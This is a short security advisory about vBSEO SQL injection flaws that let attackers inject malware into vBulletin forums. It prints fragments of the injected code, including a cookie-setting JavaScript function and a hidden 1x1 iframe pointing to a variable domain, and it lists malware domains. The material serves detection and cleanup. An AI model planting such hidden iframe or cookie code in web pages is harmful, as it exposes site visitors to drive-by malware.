vBSEO SQL Injection Malware

Updated: October 15, 2010

Two vulnerabilites in the vBSEO plugin have have lead to SQL injections of malware into vBulletin forums. On October 27, 2009 vBSEO released version 3.3.2 which fixed a SQL injection vulnerability in previous version. On September 9, 2010 vBSEO released version 3.5.2 which fixed a SQL injection vulnerability in previous versions. The malware code has been injected into the template, plugins and most recently in the datastore.

Recent Code Stored In Database:

Recent Script Formats Served on Web Pages:

function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000)  ;
 var expires=expDate.toGMTString();
SetCookie("xSe", "turk");
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>

Recent Malware Domains: newshatolscocc.txt, xroppiko.co.cc, chekolkal.co.cc